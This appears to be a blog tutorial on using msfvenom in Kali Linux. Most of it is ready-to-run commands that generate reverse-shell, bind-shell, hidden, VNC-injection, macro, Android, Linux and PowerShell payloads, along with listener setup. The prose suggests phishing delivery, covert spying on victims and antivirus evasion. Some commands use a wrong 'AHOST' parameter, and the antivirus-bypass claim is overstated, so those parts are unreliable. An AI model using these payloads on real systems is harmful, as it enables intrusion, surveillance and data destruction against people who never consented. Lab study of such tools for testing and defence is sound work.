How to use Msfvenom Commands in Kali Linux

In this article you will learn about the numerous possibilities of Msfvenom. Use this tool to construct shellcode with various extensions and tactics.

Msfvenom

Msfvenom is a command line tool for Metasploit to generate shellcode. It is also called Payload Generating and Encoding System. Because on June 8, 2015, it replaced the role of msfpayload and msfencode.

Shellcode

Shellcode is malicious computer code that sends the creator back to a remote shell. Nowadays, many large organizations are the target of malicious shellcode.

A hacker John intercepts a file and sends it to a company employee who executes it. The hacker gains remote control of a device when it is installed or executed.

Shellcode can also be inserted into legitimate software to create a backdoor.

Using Msfvenom

Firstly, use the msfvenom program to generate the shell code file. Secondly copy the payload to a Windows 7 machine and run it. However, sometimes the Windows firewall blocks this kind of payload. In addition, msfvenom also encoding payload that bypass antivirus without any doubt. Thirdly, and most importantly, the Kali Linux system must be configured to scan for incoming connections.

Requirements:

• Kali Linux with Metasploit
• Windows 7 Machine on same network
• Android Phone

Enter the msfvenom command in the Kali Linux terminal. It provides all the options for creating a payload.

msfvenom

Before using msfvenom, please read the options included in it first:

How to generate a payload with Msfvenom

You must select a platform, a payload, and sometimes an encoder before you can create a shell file. In addition, Msfvenom offers unique capabilities that allow it to bypass antivirus software.

You need to look at the 500+ payloads that are currently available.

msfvenom -l payloads

Above all, look briefly at the possible combinations. Some of them involve certain operations, like creating a user. Others are more serious, like “windows/format_all_drives” (also known as ShellcodeOfDeath). This payload formats all mounted drives on the remote target.

Reverse Shell

In contrast, a reverse shell, often referred to as a connect-back, requires the attacker to first set up a listener on his system. The target computer acts as a client that connects to this listener. Then the attacker finally receives the shell.

Let us use our Windows 7 PC as a target and create a simple reverse shell.

In the Kali terminal, enter the msfvenom combinator command as shown below:

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe > payload.exe

-p for payload, LHOST for Kali Linux IP, type ipconfig in another terminal to get your local IP.
LPORT for local port (set port 4444 as default), -f for output format and payload.exe is the name of the shellcode, you can rename it.

How to Setup for Listeners

transfer the file “payload.exe” to the target computer running Windows 7. For our purposes, you can simply drag and drop the file between the Kali system and the Windows 7 VM.

However, in real life, an attacker would probably try to get the victim to execute the shellcode. For example, by attaching the shellcode file to an official-looking email.

Start Metasploit Framework on Kali Linux by typing msfconsole in the terminal. Then set up a handler to wait for incoming connections:

use exploit/multi/handler 

Use same payload for listener.

set payload windows/shell/reverse_tcp 

You need to set default LPORT.

set LPORT 4444 

In the LHOST, you can use your local IP address.

set LHOST 192.168.1.10

Finally this exploit is ready to start listening with exploit command.

exploit

Now run the “payload.exe” file on the target Windows system, and the attacker’s terminal will display the following:

Just type exit to leave the shell and return to Metasploit. To repeat this for again listening.

Msfvenom Bind shell

A bind shell is a shell that starts a new service on the target computer. Consequently, the attacker must connect to establish a session.

msfvenom -p windows/meterpreter/bind_tcp -f exe > bind.exe

Reverse TCP Payload

A reverse shell is referred to as a connect-back. To do this, the attacker must first set up a listener on his system. The target computer acts as a client that connects to this listener, for example.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=5555 -f exe > reverse_tcp.exe

Msfvenom HTTPS Payload

The question arises: what if the victim has blocked all ports? So, The previous two payloads can be used if the victim system has the required ports open.

In conclusion, we can generate payloads that correspond to the open ports on the victim machine, e.g. 443 for https:

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.107 LPORT=443 -f exe > /root/Desktop/443.exe

Hidden Bind TCP Payload

Let us see another method offered by the msfvenom tool and try to exploit the target computer. Moreover, this time we get the shell of the victim computer and not a meterpreter session.

However, this payload runs invisibly in the background while active and is not detected by any port scanner.

msfvenom -p windows/shell_hidden_bind_tcp AHOST=192.168.0.10 LPORT=1010 -f exe > hidden.exe

Reverse Shell Payload with Netcat

Let us consequently the procedure with shell_reverse_tcp payload. Another method to get the victim’s shell session.

msfvenom -p windows/shell_reverse_tcp AHOST=192.168.0.107 LPORT=4444 -f exe > ncshell.exe

Macro Payload

To exploit the PC target, we now generate a payload using a VBA script. This payload is used to create an Excel macro.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=7777 -f vba

VNC Payload

Why do not we take advantage of the fact that this payload allows us to steal the victim’s computer without him knowing about it and observe his behavior in secret.

msfvenom -p windows/vncinject/reverse_tcp LHOST=192.168.0.107 LPORT=5900 -f exe > /root/Desktop/vnc.exe

Msfvenom Android Payload

Let us use one of the Android exploits available in the msfvenom tool and use it to our advantage. Mobile exploitation has always been a hot topic and it still is today.

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=4444 > file.apk

Linux Payload

For the Linux payload, open Kali Terminal and type the following command:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=4444 -f elf > shell

PowerShell Payload

In the Kali terminal, enter the following command to create a payload for Windows PowerShell:

msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.1.10 LPORT=4444 > shell.bat

Last but not least – Metasploit Payloads (Detailed Spreadsheet)

Access Android with Msfvenom (Cybersecurity) 🔥

Article References

1. Metasploit Documentation
2. Hacking Articles
3. Intermediate Security Testing With Kali Linux Book available on amazon
4. LoiLiangYang YouTube Channel

About The Author

Amit

See author's posts